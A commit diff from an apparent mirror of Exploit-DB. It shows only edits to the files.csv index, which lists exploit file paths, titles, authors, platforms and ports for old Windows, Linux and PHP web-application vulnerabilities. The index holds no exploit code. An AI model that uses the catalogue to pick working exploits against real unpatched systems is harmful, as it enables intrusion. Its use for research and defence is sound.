bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 07_11_2014

Browse source
This commit is contained in:
Offensive Security 2014-07-11 04:39:06 +00:00
parent 2d0742415b
commit 96dfb9b9da
40 changed files with 8708 additions and 8459 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

215
files.csv
View file

@ -258,7 +258,7 @@ id,file,description,date,author,platform,type,port
272,platforms/windows/local/272.c,"WinZIP MIME Parsing Overflow Proof of Concept Exploit",2004-04-15,snooq,windows,local,0
273,platforms/linux/local/273.c,"SquirrelMail chpasswd buffer overflow",2004-04-20,x314,linux,local,0
274,platforms/linux/dos/274.c,"Linux Kernel <= 2.6.3 (setsockopt) Local Denial of Service Exploit",2004-04-21,"Julien Tinnes",linux,dos,0
275,platforms/windows/remote/275.c,"MS Windows IIS 5.0 SSL Remote buffer overflow Exploit (MS04-011)",2004-04-21,"Johnny Cyberpunk",windows,remote,443
275,platforms/windows/remote/275.c,"MS Windows IIS 5.0 - SSL Remote Buffer Overflow Exploit (MS04-011)",2004-04-21,"Johnny Cyberpunk",windows,remote,443
276,platforms/windows/dos/276.delphi,"MS Windows 2K/XP TCP Connection Reset Remote Attack Tool",2004-04-22,Aphex,windows,dos,0
277,platforms/linux/remote/277.c,"BIND 8.2.x (TSIG) Remote Root Stack Overflow Exploit",2001-03-01,Gneisenau,linux,remote,53
279,platforms/linux/remote/279.c,"BIND 8.2.x - (TSIG) Remote Root Stack Overflow Exploit (2)",2001-03-01,LSD-PLaNET,linux,remote,53
@ -1672,7 +1672,7 @@ id,file,description,date,author,platform,type,port
1962,platforms/osx/local/1962.pl,"Mac OS X <= 10.4.6 (launchd) Local Format String Exploit (x86)",2006-06-28,"Kevin Finisterre",osx,local,0
1963,platforms/php/webapps/1963.txt,"GeekLog <= 1.4.0sr3 (_CONF[path]) Remote File Include Vulnerabilities",2006-06-29,Kw3[R]Ln,php,webapps,0
1964,platforms/php/webapps/1964.php,"GeekLog <= 1.4.0sr3 f(u)ckeditor - Remote Code Execution Exploit",2006-06-29,rgod,php,webapps,0
1965,platforms/windows/remote/1965.pm,"MS Windows RRAS RASMAN Registry Stack Overflow Exploit (MS06-025)",2006-06-29,Pusscat,windows,remote,445
1965,platforms/windows/remote/1965.pm,"MS Windows - RRAS RASMAN Registry Stack Overflow Exploit (MS06-025)",2006-06-29,Pusscat,windows,remote,445
1967,platforms/windows/dos/1967.c,"MS Windows TCP/IP Protocol Driver Remote Buffer Overflow Exploit",2006-06-30,Preddy,windows,dos,0
1968,platforms/php/webapps/1968.php,"deV!Lz Clanportal [DZCP] <= 1.34 (id) Remote SQL Injection Exploit",2006-07-01,x128,php,webapps,0
1969,platforms/php/webapps/1969.txt,"Stud.IP <= 1.3.0-2 Multiple Remote File Include Vulnerabilities",2006-07-01,"Hamid Ebadi",php,webapps,0
@ -1750,11 +1750,11 @@ id,file,description,date,author,platform,type,port
2049,platforms/php/webapps/2049.txt,"SiteDepth CMS <= 3.0.1 (SD_DIR) Remote File Include Vulnerability",2006-07-20,Aesthetico,php,webapps,0
2050,platforms/php/webapps/2050.php,"LoudBlog <= 0.5 (id) SQL Injection / Admin Credentials Disclosure",2006-07-21,rgod,php,webapps,0
2051,platforms/linux/dos/2051.py,"Sendmail <= 8.13.5 - Remote Signal Handling Exploit PoC",2006-07-21,redsand,linux,dos,0
2052,platforms/windows/remote/2052.sh,"MS Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014)",2006-07-21,redsand,windows,remote,0
2052,platforms/windows/remote/2052.sh,"MS Internet Explorer - (MDAC) Remote Code Execution Exploit (MS06-014)",2006-07-21,redsand,windows,remote,0
2053,platforms/multiple/remote/2053.rb,"Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)",2006-07-21,bannedit,multiple,remote,110
2054,platforms/windows/remote/2054.txt,"MS Windows DHCP Client Broadcast Attack Exploit (MS06-036)",2006-07-21,redsand,windows,remote,0
2054,platforms/windows/remote/2054.txt,"MS Windows - DHCP Client Broadcast Attack Exploit (MS06-036)",2006-07-21,redsand,windows,remote,0
2056,platforms/windows/local/2056.c,"Microsoft IIS ASP - Stack Overflow Exploit (MS06-034)",2006-07-21,cocoruder,windows,local,0
2057,platforms/windows/dos/2057.c,"MS Windows Mailslot Ring0 Memory Corruption Exploit (MS06-035)",2006-07-21,cocoruder,windows,dos,0
2057,platforms/windows/dos/2057.c,"MS Windows - Mailslot Ring0 Memory Corruption Exploit (MS06-035)",2006-07-21,cocoruder,windows,dos,0
2058,platforms/php/webapps/2058.txt,"PHP Forge <= 3 beta 2 (cfg_racine) Remote File Inclusion Vulnerability",2006-07-22,"Virangar Security",php,webapps,0
2059,platforms/hardware/dos/2059.cpp,"D-Link Router UPNP Stack Overflow Denial of Service Exploit (PoC)",2006-07-22,ub3rst4r,hardware,dos,0
2060,platforms/php/webapps/2060.txt,"PHP Live! <= 3.2.1 (help.php) Remote Inclusion Vulnerability",2006-07-23,magnific,php,webapps,0
@ -1856,9 +1856,9 @@ id,file,description,date,author,platform,type,port
2159,platforms/php/webapps/2159.pl,"PHPMyRing <= 4.2.0 (view_com.php) Remote SQL Injection Exploit",2006-08-09,simo64,php,webapps,0
2160,platforms/windows/dos/2160.c,"OpenMPT <= 1.17.02.43 Multiple Remote Buffer Overflow Exploit PoC",2006-08-10,"Luigi Auriemma",windows,dos,0
2161,platforms/php/webapps/2161.pl,"SAPID CMS <= 1.2.3_rc3 (rootpath) Remote Code Execution Exploit",2006-08-10,simo64,php,webapps,0
2162,platforms/windows/remote/2162.pm,"MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040)",2006-08-10,"H D Moore",windows,remote,445
2162,platforms/windows/remote/2162.pm,"MS Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040)",2006-08-10,"H D Moore",windows,remote,445
2163,platforms/php/webapps/2163.txt,"phpwcms <= 1.1-RC4 (spaw) Remote File Include Vulnerability",2006-08-10,Morgan,php,webapps,0
2164,platforms/windows/remote/2164.pm,"Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014) (2)",2006-08-10,"H D Moore",windows,remote,0
2164,platforms/windows/remote/2164.pm,"Internet Explorer - (MDAC) Remote Code Execution Exploit (MS06-014) (2)",2006-08-10,"H D Moore",windows,remote,0
2165,platforms/php/webapps/2165.txt,"Spaminator <= 1.7 (page) Remote File Include Vulnerability",2006-08-10,Drago84,php,webapps,0
2166,platforms/php/webapps/2166.txt,"Thatware <= 0.4.6 (root_path) Remote File Include Vulnerability",2006-08-10,Drago84,php,webapps,0
2167,platforms/php/webapps/2167.txt,"SaveWebPortal <= 3.4 (page) Remote File Inclusion Vulnerability",2006-08-10,Bl0od3r,php,webapps,0
@ -1916,7 +1916,7 @@ id,file,description,date,author,platform,type,port
2220,platforms/php/webapps/2220.txt,"Tutti Nova <= 1.6 (TNLIB_DIR) Remote File Include Vulnerability",2006-08-19,SHiKaA,php,webapps,0
2221,platforms/php/webapps/2221.txt,"Fantastic News <= 2.1.3 (script_path) Remote File Include Vulnerability",2006-08-19,SHiKaA,php,webapps,0
2222,platforms/php/webapps/2222.txt,"Mambo com_lurm_constructor Component <= 0.6b Include Vulnerability",2006-08-19,mdx,php,webapps,0
2223,platforms/windows/remote/2223.c,"MS Windows CanonicalizePathName() Remote Exploit (MS06-040)",2006-08-19,Preddy,windows,remote,139
2223,platforms/windows/remote/2223.c,"MS Windows - CanonicalizePathName() Remote Exploit (MS06-040)",2006-08-19,Preddy,windows,remote,139
2224,platforms/php/webapps/2224.txt,"ZZ:FlashChat <= 3.1 - (adminlog) Remote File Incude Vulnerability",2006-08-19,SHiKaA,php,webapps,0
2225,platforms/php/webapps/2225.txt,"mambo com_babackup Component <= 1.1 File Include Vulnerability",2006-08-19,mdx,php,webapps,0
2226,platforms/php/webapps/2226.txt,"NES Game and NES System <= c108122 File Include Vulnerabilities",2006-08-20,Kacper,php,webapps,0
@ -1958,7 +1958,7 @@ id,file,description,date,author,platform,type,port
2262,platforms/php/webapps/2262.php,"CMS Frogss <= 0.4 (podpis) Remote SQL Injection Exploit",2006-08-27,Kacper,php,webapps,0
2263,platforms/php/webapps/2263.txt,"Ay System CMS <= 2.6 (main.php) Remote File Include Vulnerability",2006-08-27,SHiKaA,php,webapps,0
2264,platforms/windows/local/2264.htm,"VMware 5.5.1 (ActiveX) Local Buffer Overflow Exploit",2006-08-27,c0ntex,windows,local,0
2265,platforms/windows/remote/2265.c,"MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) (2)",2006-08-28,ub3rst4r,windows,remote,445
2265,platforms/windows/remote/2265.c,"MS Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040) (2)",2006-08-28,ub3rst4r,windows,remote,445
2266,platforms/cgi/webapps/2266.txt,"Cybozu Products (id) Arbitrary File Retrieval Vulnerability",2006-08-28,"Tan Chew Keong",cgi,webapps,0
2267,platforms/cgi/webapps/2267.txt,"Cybuzu Garoon 2.1.0 - Multiple Remote SQL Injection Vulnerabilities",2006-08-28,"Tan Chew Keong",cgi,webapps,0
2268,platforms/php/webapps/2268.php,"e107 <= 0.75 - (GLOBALS Overwrite) Remote Code Execution Exploit",2006-08-28,rgod,php,webapps,0
@ -2048,7 +2048,7 @@ id,file,description,date,author,platform,type,port
2352,platforms/php/webapps/2352.txt,"webSPELL <= 4.01.01 Database Backup Download Vulnerability",2006-09-12,Trex,php,webapps,0
2353,platforms/php/webapps/2353.txt,"Vitrax Pre-modded <= 1.0.6-r3 Remote File Include Vulnerability",2006-09-12,CeNGiZ-HaN,php,webapps,0
2354,platforms/php/webapps/2354.txt,"Signkorn Guestbook <= 1.3 (dir_path) Remote File Include Vulnerability",2006-09-12,SHiKaA,php,webapps,0
2355,platforms/windows/remote/2355.pm,"MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) (2k3)",2006-09-13,"Trirat Puttaraksa",windows,remote,445
2355,platforms/windows/remote/2355.pm,"MS Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040) (2k3)",2006-09-13,"Trirat Puttaraksa",windows,remote,445
2356,platforms/php/webapps/2356.txt,"Quicksilver Forums <= 1.2.1 (set) Remote File Include Vulnerability",2006-09-13,mdx,php,webapps,0
2357,platforms/php/webapps/2357.txt,"phpunity.postcard (gallery_path) Remote File Include Vulnerability",2006-09-13,Rivertam,php,webapps,0
2358,platforms/windows/remote/2358.c,"MS Internet Explorer COM Object Remote Heap Overflow Exploit",2006-09-13,nop,windows,remote,0
@ -2105,7 +2105,7 @@ id,file,description,date,author,platform,type,port
2409,platforms/php/webapps/2409.txt,"PHPartenaire 1.0 (dix.php3) Remote File Include Vulnerability",2006-09-21,DaDIsS,php,webapps,0
2410,platforms/php/webapps/2410.txt,"phpQuestionnaire 3.12 (phpQRootDir) Remote File Include Vulnerability",2006-09-21,Solpot,php,webapps,0
2411,platforms/php/webapps/2411.pl,"ProgSys <= 0.156 (RR.php) Remote File Include Exploit",2006-09-21,Kacper,php,webapps,0
2412,platforms/windows/local/2412.c,"MS Windows (Windows Kernel) Privilege Escalation Exploit (MS06-049)",2006-09-21,SoBeIt,windows,local,0
2412,platforms/windows/local/2412.c,"MS Windows (Windows Kernel) - Privilege Escalation Exploit (MS06-049)",2006-09-21,SoBeIt,windows,local,0
2413,platforms/php/webapps/2413.txt,"SolidState <= 0.4 - Multiple Remote File Include Vulnerabilities",2006-09-21,Kacper,php,webapps,0
2414,platforms/php/webapps/2414.txt,"Wili-CMS <= 0.1.1 (include/xss/full path) Remote Vulnerabilities",2006-09-21,"HACKERS PAL",php,webapps,0
2415,platforms/php/webapps/2415.php,"exV2 <= 2.0.4.3 - extract() Remote Command Execution Exploit",2006-09-22,rgod,php,webapps,0
@ -2476,7 +2476,7 @@ id,file,description,date,author,platform,type,port
2786,platforms/php/webapps/2786.txt,"torrentflux <= 2.2 (create/exec/delete) Multiple Vulnerabilities",2006-11-15,r0ut3r,php,webapps,0
2787,platforms/windows/dos/2787.c,"UniversalFTP 1.0.50 (MKD) Remote Denial of Service Exploit",2006-11-15,"Greg Linares",windows,dos,0
2788,platforms/osx/local/2788.pl,"Kerio WebSTAR 5.4.2 (libucache.dylib) Privilege Escalation Exploit (OSX)",2006-11-15,"Kevin Finisterre",osx,local,0
2789,platforms/windows/remote/2789.cpp,"MS Windows NetpManageIPCConnect Stack Overflow Exploit (MS06-070)",2006-11-16,cocoruder,windows,remote,0
2789,platforms/windows/remote/2789.cpp,"MS Windows - NetpManageIPCConnect Stack Overflow Exploit (MS06-070)",2006-11-16,cocoruder,windows,remote,0
2790,platforms/php/webapps/2790.pl,"Etomite CMS <= 0.6.1.2 (manager/index.php) Local File Include Exploit",2006-11-16,Revenge,php,webapps,0
2791,platforms/php/webapps/2791.txt,"HTTP Upload Tool (download.php) Information Disclosure Vulnerability",2006-11-16,"Craig Heffner",php,webapps,0
2794,platforms/php/webapps/2794.txt,"mg.applanix <= 1.3.1 (apx_root_path) Remote File Include Vulnerabilities",2006-11-17,v1per-haCker,php,webapps,0
@ -2485,7 +2485,7 @@ id,file,description,date,author,platform,type,port
2797,platforms/php/webapps/2797.txt,"Powies pForum <= 1.29a (editpoll.php) SQL Injection Vulnerability",2006-11-17,SHiKaA,php,webapps,0
2798,platforms/php/webapps/2798.txt,"Powies MatchMaker 4.05 (matchdetail.php) SQL Injection Vulnerability",2006-11-17,SHiKaA,php,webapps,0
2799,platforms/php/webapps/2799.txt,"mxBB Module calsnails 1.06 (mx_common.php) File Include Vulnerability",2006-11-17,bd0rk,php,webapps,0
2800,platforms/windows/remote/2800.cpp,"MS Windows Wkssvc NetrJoinDomain2 Stack Overflow Exploit (MS06-070)",2006-11-17,"S A Stevens",windows,remote,0
2800,platforms/windows/remote/2800.cpp,"MS Windows - Wkssvc NetrJoinDomain2 Stack Overflow Exploit (MS06-070)",2006-11-17,"S A Stevens",windows,remote,0
2807,platforms/php/webapps/2807.pl,"MosReporter Joomla Component 0.9.3 - Remote File Include Exploit",2006-11-17,Crackers_Child,php,webapps,0
2808,platforms/php/webapps/2808.txt,"Dicshunary 0.1a (check_status.php) Remote File Include Vulnerability",2006-11-17,DeltahackingTEAM,php,webapps,0
2809,platforms/windows/remote/2809.py,"MS Windows NetpManageIPCConnect Stack Overflow Exploit (py)",2006-11-18,"Winny Thomas",windows,remote,445
@ -2574,7 +2574,7 @@ id,file,description,date,author,platform,type,port
2897,platforms/php/webapps/2897.txt,"CM68 News <= 12.02.06 (addpth) Remote File Inclusion Vulnerability",2006-12-08,"Paul Bakoyiannis",php,webapps,0
2898,platforms/php/webapps/2898.txt,"ThinkEdit 1.9.2 (render.php) Remote File Inclusion Vulnerability",2006-12-08,r0ut3r,php,webapps,0
2899,platforms/php/webapps/2899.txt,"paFileDB 3.5.2/3.5.3 - Remote Login Bypass SQL Injection Vulnerability",2006-12-08,koray,php,webapps,0
2900,platforms/windows/dos/2900.py,"MS Windows DNS Resolution Remote Denial of Service PoC (MS06-041)",2006-12-09,"Winny Thomas",windows,dos,0
2900,platforms/windows/dos/2900.py,"MS Windows DNS Resolution - Remote Denial of Service PoC (MS06-041)",2006-12-09,"Winny Thomas",windows,dos,0
2901,platforms/windows/dos/2901.php,"Filezilla FTP Server 0.9.20b/0.9.21 (STOR) Denial of Service Exploit",2006-12-09,rgod,windows,dos,0
2902,platforms/php/webapps/2902.pl,"TorrentFlux 2.2 (downloaddetails.php) Local File Disclosure Exploit",2006-12-09,r0ut3r,php,webapps,0
2903,platforms/php/webapps/2903.pl,"TorrentFlux 2.2 (maketorrent.php) Remote Command Execution Exploit",2006-12-09,r0ut3r,php,webapps,0
@ -2806,7 +2806,7 @@ id,file,description,date,author,platform,type,port
3133,platforms/windows/remote/3133.pl,"Mercur Messaging 2005 IMAP Remote Buffer Overflow Exploit",2007-01-15,"Jacopo Cervini",windows,remote,143
3134,platforms/php/webapps/3134.php,"KGB <= 1.9 (sesskglogadmin.php) Local File Include Exploit",2007-01-15,Kacper,php,webapps,0
3135,platforms/asp/webapps/3135.txt,"Okul Web Otomasyon Sistemi 4.0.1 - Remote SQL Injection Vulnerability",2007-01-15,"ilker Kandemir",asp,webapps,0
3137,platforms/windows/remote/3137.html,"MS Internet Explorer VML Remote Buffer Overflow Exploit (MS07-004)",2007-01-16,LifeAsaGeek,windows,remote,0
3137,platforms/windows/remote/3137.html,"MS Internet Explorer - VML Remote Buffer Overflow Exploit (MS07-004)",2007-01-16,LifeAsaGeek,windows,remote,0
3138,platforms/windows/dos/3138.pl,"Twilight Webserver 1.3.3.0 (GET) Remote Denial of Service Exploit",2003-07-07,N/A,windows,dos,0
3139,platforms/osx/dos/3139.rb,"Colloquy <= 2.1.3545 (INVITE) Format String Denial of Service Exploit",2007-01-17,MoAB,osx,dos,0
3140,platforms/windows/remote/3140.pl,"Sami FTP Server 2.0.2 (USER/PASS) Remote Buffer Overflow Exploit",2007-01-17,UmZ,windows,remote,21
@ -2817,7 +2817,7 @@ id,file,description,date,author,platform,type,port
3145,platforms/php/webapps/3145.txt,"PHPMyphorum 1.5a (mep/frame.php) Remote File Include Vulnerability",2007-01-17,v1per-haCker,php,webapps,0
3146,platforms/php/webapps/3146.pl,"Woltlab Burning Board <= 1.0.2 / 2.3.6 - search.php SQL Injection Exploit (3)",2007-01-17,666,php,webapps,0
3147,platforms/php/webapps/3147.txt,"Uberghey 0.3.1 (frontpage.php) Remote File Include Vulnerability",2007-01-17,GoLd_M,php,webapps,0
3148,platforms/windows/remote/3148.pl,"MS Internet Explorer VML Download and Execute Exploit (MS07-004)",2007-01-17,pang0,windows,remote,0
3148,platforms/windows/remote/3148.pl,"MS Internet Explorer - VML Download and Execute Exploit (MS07-004)",2007-01-17,pang0,windows,remote,0
3149,platforms/windows/local/3149.cpp,"Microsoft Help Workshop 4.03.0002 (.CNT) Buffer Overflow Exploit",2007-01-17,porkythepig,windows,local,0
3150,platforms/php/webapps/3150.txt,"Oreon <= 1.2.3 RC4 (lang/index.php file) Remote InclusionVulnerability",2007-01-17,3l3ctric-Cracker,php,webapps,0
3151,platforms/osx/dos/3151.rb,"Mac OS X 10.4.8 SLP Daemon Service Registration Buffer Overflow PoC",2007-01-18,MoAB,osx,dos,0
@ -2861,7 +2861,7 @@ id,file,description,date,author,platform,type,port
3190,platforms/windows/dos/3190.py,"MS Windows Explorer (AVI) Unspecified Denial of Service Exploit",2007-01-24,shinnai,windows,dos,0
3191,platforms/php/webapps/3191.txt,"vhostadmin 0.1 (MODULES_DIR) Remote File Inclusion Vulnerability",2007-01-24,3l3ctric-Cracker,php,webapps,0
3192,platforms/php/webapps/3192.pl,"Xero Portal (phpbb_root_path) Remote File Include Vulnerablity",2007-01-24,"Mehmet Ince",php,webapps,0
3193,platforms/windows/dos/3193.py,"Microsoft Excel Malformed Palette Record DoS PoC (MS07-002)",2007-01-25,LifeAsaGeek,windows,dos,0
3193,platforms/windows/dos/3193.py,"Microsoft Excel - Malformed Palette Record DoS PoC (MS07-002)",2007-01-25,LifeAsaGeek,windows,dos,0
3194,platforms/asp/webapps/3194.txt,"makit Newsposter Script 3.0 - Remote SQL Injection Vulnerability",2007-01-25,ajann,asp,webapps,0
3195,platforms/asp/webapps/3195.txt,"GPS CMS 1.2 (print.asp) Remote SQL Injection Vulnerability",2007-01-25,ajann,asp,webapps,0
3196,platforms/php/webapps/3196.php,"Aztek Forum 4.0 - Multiple Vulnerabilities Exploit",2007-01-25,DarkFig,php,webapps,0
@ -3108,7 +3108,7 @@ id,file,description,date,author,platform,type,port
3441,platforms/linux/dos/3441.c,"Linux Omnikey Cardman 4040 driver Local Buffer Overflow Exploit PoC",2007-03-09,"Daniel Roethlisberger",linux,dos,0
3442,platforms/multiple/local/3442.php,"PHP 4.4.6 cpdf_open() Local Source Code Discslosure PoC",2007-03-09,rgod,multiple,local,0
3443,platforms/php/webapps/3443.txt,"PMB Services <= 3.0.13 Multiple Remote File Inclusion Vulnerability",2007-03-09,K-159,php,webapps,0
3444,platforms/windows/dos/3444.pl,"MS Internet Explorer (FTP Server Response) DoS Exploit (MS07-016)",2007-03-09,"Mathew Rowley",windows,dos,0
3444,platforms/windows/dos/3444.pl,"MS Internet Explorer - (FTP Server Response) DoS Exploit (MS07-016)",2007-03-09,"Mathew Rowley",windows,dos,0
3447,platforms/php/webapps/3447.txt,"Grayscale Blog 0.8.0 (Security Bypass/SQL/XSS) Multiple Remote Vulns",2007-03-09,Omni,php,webapps,0
3448,platforms/php/webapps/3448.txt,"work system e-commerce <= 3.0.5 - Remote File Inclusion Vulnerability",2007-03-10,"Rodrigo Duarte",php,webapps,0
3449,platforms/php/webapps/3449.txt,"HC Newssystem 1.0-1.4 (index.php ID) Remote SQL Injection Vulnerability",2007-03-10,WiLdBoY,php,webapps,0
@ -3235,7 +3235,7 @@ id,file,description,date,author,platform,type,port
3574,platforms/php/webapps/3574.pl,"PBlang 4.66z Remote Code Execution Exploit",2007-03-25,Hessam-x,php,webapps,0
3575,platforms/windows/remote/3575.cpp,"Frontbase <= 4.2.7 - Remote Buffer Overflow Exploit (windows)",2007-03-25,Heretic2,windows,remote,0
3576,platforms/windows/local/3576.php,"PHP 5.2.1 with PECL phpDOC Local Buffer Overflow Exploit",2007-03-25,rgod,windows,local,0
3577,platforms/windows/remote/3577.html,"MS Internet Explorer Recordset Double Free Memory Exploit (MS07-009)",2007-03-26,N/A,windows,remote,0
3577,platforms/windows/remote/3577.html,"MS Internet Explorer - Recordset Double Free Memory Exploit (MS07-009)",2007-03-26,N/A,windows,remote,0
3578,platforms/bsd/local/3578.c,"FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit",2007-03-26,harry,bsd,local,0
3579,platforms/windows/remote/3579.py,"Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit (Win2K SP4)",2007-03-26,"Winny Thomas",windows,remote,21
3580,platforms/php/webapps/3580.pl,"IceBB 1.0-rc5 Remote Create Admin Exploit",2007-03-26,Hessam-x,php,webapps,0
@ -3342,7 +3342,7 @@ id,file,description,date,author,platform,type,port
3685,platforms/php/webapps/3685.txt,"MyBlog: PHP and MySQL Blog/CMS software RFI Vulnerability",2007-04-08,the_Edit0r,php,webapps,0
3686,platforms/php/webapps/3686.txt,"WitShare 0.9 (index.php menu) Local File Inclusion Vulnerability",2007-04-08,the_Edit0r,php,webapps,0
3687,platforms/php/webapps/3687.txt,"ScarNews 1.2.1 (sn_admin_dir) Local File Inclusion Exploit",2007-04-08,BeyazKurt,php,webapps,0
3688,platforms/windows/local/3688.c,"MS Windows GDI Local Privilege Escalation Exploit (MS07-017)",2007-04-08,Ivanlef0u,windows,local,0
3688,platforms/windows/local/3688.c,"MS Windows GDI - Local Privilege Escalation Exploit (MS07-017)",2007-04-08,Ivanlef0u,windows,local,0
3689,platforms/php/webapps/3689.txt,"PcP-Guestbook 3.0 (lang) Local File Inclusion Vulnerabilities",2007-04-08,Dj7xpl,php,webapps,0
3690,platforms/windows/dos/3690.txt,"microsoft office word 2007 - Multiple Vulnerabilities",2007-04-09,muts,windows,dos,0
3691,platforms/php/webapps/3691.txt,"Battle.net Clan Script for PHP 1.5.1 - Remote SQL Injection Vulnerability",2007-04-09,"h a c k e r _ X",php,webapps,0
@ -3381,7 +3381,7 @@ id,file,description,date,author,platform,type,port
3725,platforms/php/webapps/3725.php,"Chatness <= 2.5.3 (options.php/save.php) Remote Code Execution Exploit",2007-04-12,Gammarays,php,webapps,0
3726,platforms/multiple/dos/3726.c,"Ettercap-NG 0.7.3 - Remote Denial of Service Exploit",2007-04-13,evilrabbi,multiple,dos,0
3727,platforms/windows/local/3727.c,"VCDGear <= 3.56 Build 050213 (FILE) Local Code Execution Exploit",2007-04-13,InTeL,windows,local,0
3728,platforms/windows/remote/3728.c,"IE NCTAudioFile2.AudioFile ActiveX Remote Overflow Exploit",2007-04-13,InTeL,windows,remote,0
3728,platforms/windows/remote/3728.c,"Internet Explorer NCTAudioFile2.AudioFile ActiveX Remote Overflow Exploit",2007-04-13,InTeL,windows,remote,0
3729,platforms/php/webapps/3729.txt,"qdblog 0.4 (SQL Injection/lfi) Multiple Vulnerabilities",2007-04-13,Omni,php,webapps,0
3730,platforms/linux/local/3730.txt,"ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow Exploit (exec-shield)",2007-04-13,Xpl017Elz,linux,local,0
3731,platforms/php/webapps/3731.php,"Frogss CMS <= 0.7 - Remote SQL Injection Exploit",2007-04-13,Kacper,php,webapps,0
@ -3408,7 +3408,7 @@ id,file,description,date,author,platform,type,port
3752,platforms/php/webapps/3752.txt,"AjPortal2Php (PagePrefix) Remote File Inclusion Vulnerabilities",2007-04-17,"Alkomandoz Hacker",php,webapps,0
3753,platforms/php/webapps/3753.txt,"Joomla Component JoomlaPack 1.0.4a2 RE (CAltInstaller.php) RFI",2007-04-17,"Cold Zero",php,webapps,0
3754,platforms/php/webapps/3754.pl,"MiniGal b13 (image backdoor) Remote Code Execution Exploit",2007-04-17,Dj7xpl,php,webapps,0
3755,platforms/windows/local/3755.c,"MS Windows GDI Local Privilege Escalation Exploit (MS07-017) 2",2007-04-17,"Lionel d'Hauenens",windows,local,0
3755,platforms/windows/local/3755.c,"MS Windows GDI - Local Privilege Escalation Exploit (MS07-017) (2)",2007-04-17,"Lionel d'Hauenens",windows,local,0
3756,platforms/php/webapps/3756.txt,"Cabron Connector 1.1.0-Full Remote File Inclusion Vulnerability",2007-04-17,Dj7xpl,php,webapps,0
3757,platforms/windows/local/3757.txt,"OllyDbg 1.10 Local Format String Exploit",2007-04-17,jamikazu,windows,local,0
3758,platforms/php/webapps/3758.php,"ShoutPro <= 1.5.2 (shout.php) Remote Code Injection Exploit",2007-04-17,Gammarays,php,webapps,0
@ -3457,11 +3457,11 @@ id,file,description,date,author,platform,type,port
3801,platforms/windows/local/3801.c,"Gimp 2.2.14 .RAS File SUNRAS Plugin Buffer Overflow Exploit",2007-04-26,Marsu,windows,local,0
3802,platforms/php/webapps/3802.txt,"phpBandManager 0.8 (index.php pg) Remote File Inclusion Vulnerability",2007-04-26,koray,php,webapps,0
3803,platforms/php/webapps/3803.txt,"phpOracleView (include_all.inc.php page_dir) RFI Vulnerability",2007-04-26,"Alkomandoz Hacker",php,webapps,0
3804,platforms/windows/remote/3804.txt,"MS Windows (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017)",2007-04-26,"Lionel d'Hauenens",windows,remote,0
3804,platforms/windows/remote/3804.txt,"MS Windows - (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017)",2007-04-26,"Lionel d'Hauenens",windows,remote,0
3805,platforms/php/webapps/3805.txt,"Firefly 1.1.01 (doc_root) Remote File Inclusion Vulnerabilities",2007-04-26,"Alkomandoz Hacker",php,webapps,0
3806,platforms/php/webapps/3806.txt,"EsForum 3.0 (forum.php idsalon) Remote SQL Injection Vulnerability",2007-04-26,"ilker Kandemir",php,webapps,0
3807,platforms/linux/dos/3807.c,"MyDNS 1.1.0 - Remote Heap Overflow PoC",2007-04-27,mu-b,linux,dos,0
3808,platforms/windows/remote/3808.html,"IE NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow Exploit 2",2007-04-27,shinnai,windows,remote,0
3808,platforms/windows/remote/3808.html,"Internet Explorer NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow Exploit 2",2007-04-27,shinnai,windows,remote,0
3809,platforms/php/webapps/3809.txt,"burnCMS <= 0.2 (root) Remote File Inclusion Vulnerabilities",2007-04-27,GoLd_M,php,webapps,0
3810,platforms/windows/remote/3810.html,"IPIX Image Well ActiveX (iPIX-ImageWell-ipix.dll) BoF Exploit",2007-04-27,"Umesh Wanve",windows,remote,0
3811,platforms/windows/local/3811.c,"IrfanView <= 4.00 .IFF File Buffer Overflow Exploit",2007-04-27,Marsu,windows,local,0
@ -3544,7 +3544,7 @@ id,file,description,date,author,platform,type,port
3888,platforms/windows/local/3888.c,"Gimp 2.2.14 .RAS File Download/Execute Buffer Overflow Exploit (win32)",2007-05-09,"Kristian Hermansen",windows,local,0
3890,platforms/windows/dos/3890.html,"McAfee VirusScan 10.0.21 ActiveX control Stack Overflow PoC",2007-05-09,callAX,windows,dos,0
3891,platforms/windows/dos/3891.html,"Remote Display Dev kit 1.2.1.0 RControl.dll Denial of Service Exploit",2007-05-10,shinnai,windows,dos,0
3892,platforms/windows/remote/3892.html,"MS Internet Explorer <= 7 Remote Arbitrary File Rewrite PoC (MS07-027)",2007-05-10,"Andres Tarasco",windows,remote,0
3892,platforms/windows/remote/3892.html,"MS Internet Explorer <= 7 - Remote Arbitrary File Rewrite PoC (MS07-027)",2007-05-10,"Andres Tarasco",windows,remote,0
3893,platforms/windows/remote/3893.c,"McAfee Security Center IsOldAppInstalled ActiveX BoF Exploit",2007-05-10,Jambalaya,windows,remote,0
3894,platforms/php/webapps/3894.txt,"Original 0.11 config.inc.php x[1] Remote File Inclusion Vulnerability",2007-05-10,GoLd_M,php,webapps,0
3895,platforms/php/webapps/3895.txt,"Thyme Calendar 1.3 - Remote SQL Injection Vulnerability",2007-05-10,warlord,php,webapps,0
@ -3644,7 +3644,7 @@ id,file,description,date,author,platform,type,port
3990,platforms/php/webapps/3990.txt,"vBulletin vBGSiteMap 2.41 (root) Remote File Inclusion Vulnerabilities",2007-05-25,"Cold Zero",php,webapps,0
3991,platforms/php/webapps/3991.txt,"OpenBASE 0.6a (root_prefix) Remote File Inclusion Vulnerabilities",2007-05-25,DeltahackingTEAM,php,webapps,0
3992,platforms/php/webapps/3992.txt,"FlaP 1.0b (pachtofile) Remote File Inclusion Vulnerabilities",2007-05-25,"Mehmet Ince",php,webapps,0
